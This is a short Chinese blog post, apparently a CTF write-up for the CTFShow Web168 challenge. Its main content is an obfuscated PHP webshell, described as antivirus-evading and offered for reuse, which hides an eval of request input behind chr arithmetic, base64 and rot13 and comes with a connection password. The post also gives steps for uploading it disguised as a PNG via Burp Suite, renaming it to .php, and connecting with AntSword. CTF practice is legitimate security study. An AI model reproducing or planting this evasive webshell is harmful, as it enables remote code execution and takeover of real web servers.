CTFShow-Web168:免杀脚本

CTFShow-Web168:免杀脚本

eval,system还有$_POST$_GET进行过滤,$_REQUEST还可以用

🛠️ Web167 WriteUp

提供一个免杀脚本:

<?php $bFIY=create_function(chr(25380/705).chr(92115/801).base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ=='),chr(0x16964/0x394).chr(0x6f16/0xf1).base64_decode('YQ==').base64_decode('bA==').chr(060340/01154).chr(01041-0775).base64_decode('cw==').str_rot13('b').chr(01504-01327).base64_decode('ZQ==').chr(057176/01116).chr(0xe3b4/0x3dc));$bFIY(base64_decode('NjgxO'.'Tc7QG'.'V2QWw'.'oJF9Q'.''.str_rot13('G').str_rot13('1').str_rot13('A').base64_decode('VQ==').str_rot13('J').''.''.chr(0x304-0x2d3).base64_decode('Ug==').chr(13197/249).str_rot13('F').base64_decode('MQ==').''.'B1bnR'.'VXSk7'.'MjA0N'.'TkxOw'.'=='.''));?>

TyKPuntU是链接密码

  1. 使用Burp Suite上传内容为免杀脚本的图片a.png绕过前端验证,修改后缀为a.php

  2. 访问a.php,路径为/upload/a.php

    上传成功返回:**Deprecated**: Function create_function() is deprecated in **/var/www/html/upload/a.php** on line **1**

  3. 使用蚁剑连接

    image-20250214143807729
posted @ 2025-02-14 14:47  Zebra233  阅读(38)  评论(0)    收藏  举报